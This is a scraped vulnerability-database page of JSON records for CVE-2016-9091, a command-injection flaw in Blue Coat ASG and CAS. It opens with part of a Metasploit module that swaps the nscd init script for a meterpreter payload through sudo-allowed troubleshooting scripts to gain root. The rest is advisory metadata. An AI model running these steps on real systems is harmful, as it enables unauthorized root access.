#{id}, but must be tomcat\")\n      fail_with(Failure::NoAccess, \"Session running as id= #{id}, but must be tomcat\")\n    end\n \n    clprelease=cmd_exec(\"cat /etc/clp-release | cut -d \\\" \\\" -f 3\")\n    if clprelease!=\"1.3.7.1\"\n      print_status(\"#{peer} - ERROR - BlueCoat version #{clprelease}, but must be 1.3.7.1\")\n      fail_with(Failure::NotVulnerable, \"BlueCoat version #{clprelease}, but must be 1.3.7.1\")\n    end\n \n    return Exploit::CheckCode::Vulnerable\n  end\n  def exploit\n    print_status(\"#{peer} - Checking for vulnerable BlueCoat session...\")\n    if check != CheckCode::Vulnerable\n      fail_with(Failure::NotVulnerable, \"FAILED Exploit - BlueCoat not running as tomcat or not version 1.3.7.1\")\n    end\n \n    print_status(\"#{peer} - Running Exploit...\")\n    exe_file = \"#{datastore[\"WritableDir\"]}/#{rand_text_alpha(3 + rand(5))}.elf\"\n    write_file(exe_file, generate_payload_exe)\n    cmd_exec \"chmod +x #{exe_file}\"\n \n    begin\n      #Backup original nscd init script\n      cmd_exec \"/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /etc/init.d/nscd /data/bluecoat/avenger/ui/logs/tro$\n      #Replaces /etc/init.d/nscd script with meterpreter payload\n      cmd_exec \"/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh #{exe_file} /data/bluecoat/avenger/ui/logs/troubles$\n      #Executes meterpreter payload as root\n      cmd_exec \"/usr/bin/sudo /opt/bluecoat/avenger/scripts/flush_dns.sh\"\n      #note, flush_dns.sh waits for payload to exit. (killing it falls over to init pid=1)\n    ensure\n      #Restores original nscd init script\n      cmd_exec \"/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /var/log/nscd.backup /data/bluecoat/avenger/ui/logs$\n      #Remove meterpreter payload (precautionary as most recent mv_troubleshooting.sh should also remove it)\n      cmd_exec \"/bin/rm -f #{exe_file}\"\n    end\n    print_status(\"#{peer} - The exploit module has finished\")\n    #Maybe something here to deal with timeouts?? noticied inconsistant..  Exploit failed: Rex::TimeoutError Operation timed out. \n \n  end\nend\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-9091"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      },
      {
        "db": "BID",
        "id": "97372"
      },
      {
        "db": "VULHUB",
        "id": "VHN-97911"
      },
      {
        "db": "PACKETSTORM",
        "id": "141909"
      }
    ],
    "trust": 2.61
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-97911",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-97911"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-9091",
        "trust": 3.5
      },
      {
        "db": "BID",
        "id": "97372",
        "trust": 2.0
      },
      {
        "db": "EXPLOIT-DB",
        "id": "41785",
        "trust": 1.7
      },
      {
        "db": "EXPLOIT-DB",
        "id": "41786",
        "trust": 1.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-008286",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-236",
        "trust": 0.7
      },
      {
        "db": "BID",
        "id": "41785",
        "trust": 0.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-05236",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "141909",
        "trust": 0.2
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-92941",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-97911",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      },
      {
        "db": "VULHUB",
        "id": "VHN-97911"
      },
      {
        "db": "BID",
        "id": "97372"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      },
      {
        "db": "PACKETSTORM",
        "id": "141909"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-9091"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-236"
      }
    ]
  },
  "id": "VAR-201704-0485",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      },
      {
        "db": "VULHUB",
        "id": "VHN-97911"
      }
    ],
    "trust": 0.87514534
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:22:44.941000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "SA138",
        "trust": 0.8,
        "url": "https://bto.bluecoat.com/security-advisory/sa138"
      },
      {
        "title": "BluecoatASG6.6/CASOS Command Injection Vulnerability Vulnerability Patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/92633"
      },
      {
        "title": "Blue Coat Advanced Secure Gateway  and Content Analysis System Fixes for operating system command injection vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=69073"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-236"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-78",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-97911"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-9091"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.1,
        "url": "https://bto.bluecoat.com/security-advisory/sa138"
      },
      {
        "trust": 1.7,
        "url": "https://www.exploit-db.com/exploits/41785/"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/97372"
      },
      {
        "trust": 1.1,
        "url": "https://www.exploit-db.com/exploits/41786/"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-9091"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-9091"
      },
      {
        "trust": 0.3,
        "url": "https://www.bluecoat.com/"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/rapid7/metasploit-framework"
      },
      {
        "trust": 0.1,
        "url": "http://https://bto.bluecoat.com/security-advisory/sa138\u0027]"
      },
      {
        "trust": 0.1,
        "url": "http://metasploit.com/download"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      },
      {
        "db": "VULHUB",
        "id": "VHN-97911"
      },
      {
        "db": "BID",
        "id": "97372"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      },
      {
        "db": "PACKETSTORM",
        "id": "141909"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-9091"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-236"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      },
      {
        "db": "VULHUB",
        "id": "VHN-97911"
      },
      {
        "db": "BID",
        "id": "97372"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      },
      {
        "db": "PACKETSTORM",
        "id": "141909"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-9091"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-236"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-04-24T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      },
      {
        "date": "2017-04-05T00:00:00",
        "db": "VULHUB",
        "id": "VHN-97911"
      },
      {
        "date": "2017-04-03T00:00:00",
        "db": "BID",
        "id": "97372"
      },
      {
        "date": "2017-05-12T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      },
      {
        "date": "2017-04-03T03:33:00",
        "db": "PACKETSTORM",
        "id": "141909"
      },
      {
        "date": "2017-04-05T15:59:00.170000",
        "db": "NVD",
        "id": "CVE-2016-9091"
      },
      {
        "date": "2017-04-07T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201704-236"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-04-24T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-05236"
      },
      {
        "date": "2017-08-16T00:00:00",
        "db": "VULHUB",
        "id": "VHN-97911"
      },
      {
        "date": "2017-04-11T00:02:00",
        "db": "BID",
        "id": "97372"
      },
      {
        "date": "2017-05-12T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      },
      {
        "date": "2017-08-16T01:29:11.507000",
        "db": "NVD",
        "id": "CVE-2016-9091"
      },
      {
        "date": "2017-04-07T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201704-236"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-236"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Blue Coat Advanced Secure Gateway and  Content Analysis System In  OS Command injection vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-008286"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "operating system commend injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-236"
      }
    ],
    "trust": 0.6
  }
}

gsd-2016-9091

Vulnerability from gsd

Modified

2023-12-13 01:21

Details

Aliases

CVE-2016-9091

Aliases

CVE-2016-9091

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2016-9091",
    "description": "Blue Coat Advanced Secure Gateway (ASG) 6.6 before 6.6.5.4 and Content Analysis System (CAS) 1.3 before 1.3.7.4 are susceptible to an OS command injection vulnerability. An authenticated malicious administrator can execute arbitrary OS commands with elevated system privileges.",
    "id": "GSD-2016-9091",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2016-9091"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2016-9091"
      ],
      "details": "Blue Coat Advanced Secure Gateway (ASG) 6.6 before 6.6.5.4 and Content Analysis System (CAS) 1.3 before 1.3.7.4 are susceptible to an OS command injection vulnerability. An authenticated malicious administrator can execute arbitrary OS commands with elevated system privileges.",
      "id": "GSD-2016-9091",
      "modified": "2023-12-13T01:21:21.751561Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "secure@symantec.com",
        "ID": "CVE-2016-9091",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "Blue Coat ASG",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "6.6 prior to 6.6.5.4"
                        }
                      ]
                    }
                  },
                  {
                    "product_name": "Blue Coat CAS",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "1.3 prior to 1.3.7.4"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "Symantec Corporation"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Blue Coat Advanced Secure Gateway (ASG) 6.6 before 6.6.5.4 and Content Analysis System (CAS) 1.3 before 1.3.7.4 are susceptible to an OS command injection vulnerability. An authenticated malicious administrator can execute arbitrary OS commands with elevated system privileges."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "OS command injection"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "97372",
            "refsource": "BID",
            "url": "http://www.securityfocus.com/bid/97372"
          },
          {
            "name": "41785",
            "refsource": "EXPLOIT-DB",
            "url": "https://www.exploit-db.com/exploits/41785/"
          },
          {
            "name": "41786",
            "refsource": "EXPLOIT-DB",
            "url": "https://www.exploit-db.com/exploits/41786/"
          },
          {
            "name": "https://bto.bluecoat.com/security-advisory/sa138",
            "refsource": "CONFIRM",
            "url": "https://bto.bluecoat.com/security-advisory/sa138"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:bluecoat:advanced_secure_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "6.6.5.2",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:bluecoat:content_analysis_system_software:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "1.3.7.3",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "secure@symantec.com",
          "ID": "CVE-2016-9091"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Blue Coat Advanced Secure Gateway (ASG) 6.6 before 6.6.5.4 and Content Analysis System (CAS) 1.3 before 1.3.7.4 are susceptible to an OS command injection vulnerability. An authenticated malicious administrator can execute arbitrary OS commands with elevated system privileges."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-78"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://bto.bluecoat.com/security-advisory/sa138",
              "refsource": "CONFIRM",
              "tags": [
                "Mitigation",
                "Vendor Advisory"
              ],
              "url": "https://bto.bluecoat.com/security-advisory/sa138"
            },
            {
              "name": "97372",
              "refsource": "BID",
              "tags": [
                "VDB Entry",
                "Third Party Advisory"
              ],
              "url": "http://www.securityfocus.com/bid/97372"
            },
            {
              "name": "41786",
              "refsource": "EXPLOIT-DB",
              "tags": [],
              "url": "https://www.exploit-db.com/exploits/41786/"
            },
            {
              "name": "41785",
              "refsource": "EXPLOIT-DB",
              "tags": [],
              "url": "https://www.exploit-db.com/exploits/41785/"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "integrityImpact": "COMPLETE",
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          "exploitabilityScore": 8.0,
          "impactScore": 10.0,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2017-08-16T01:29Z",
      "publishedDate": "2017-04-05T15:59Z"
    }
  }
}

ghsa-mgjw-ppjc-jj5p

Vulnerability from github

Published

2022-05-17 02:13

Modified

2022-05-17 02:13

Severity ?

7.2 (High) - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2016-9091"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-04-05T15:59:00Z",
    "severity": "HIGH"
  },
  "details": "Blue Coat Advanced Secure Gateway (ASG) 6.6 before 6.6.5.4 and Content Analysis System (CAS) 1.3 before 1.3.7.4 are susceptible to an OS command injection vulnerability. An authenticated malicious administrator can execute arbitrary OS commands with elevated system privileges.",
  "id": "GHSA-mgjw-ppjc-jj5p",
  "modified": "2022-05-17T02:13:04Z",
  "published": "2022-05-17T02:13:04Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-9091"
    },
    {
      "type": "WEB",
      "url": "https://bto.bluecoat.com/security-advisory/sa138"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/41785"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/41786"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/97372"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2016-9091

Vulnerability from cvelistv5

var-201704-0485

Vulnerability from variot

Date: April 3, 2017

Exploit Authors: Chris Hebert, Peter Paccione and Corey Boyd

Contact: chrisdhebert[at]gmail.com

Vendor Security Advisory: https://bto.bluecoat.com/security-advisory/sa138

Version: CAS 1.3 prior to 1.3.7.4 & ASG 6.6 prior to 6.6.5.4 are vulnerable

Tested on: BlueCoat CAS 1.3.7.1

CVE : cve-2016-9091

Timeline:

Metasploit Module - root priv escalation (via mvtroubleshooting.sh)

This module requires Metasploit: http://metasploit.com/download

Current source: https://github.com/rapid7/metasploit-framework

gsd-2016-9091

Vulnerability from gsd

ghsa-mgjw-ppjc-jj5p

Vulnerability from github

Tags

Sightings

Nomenclature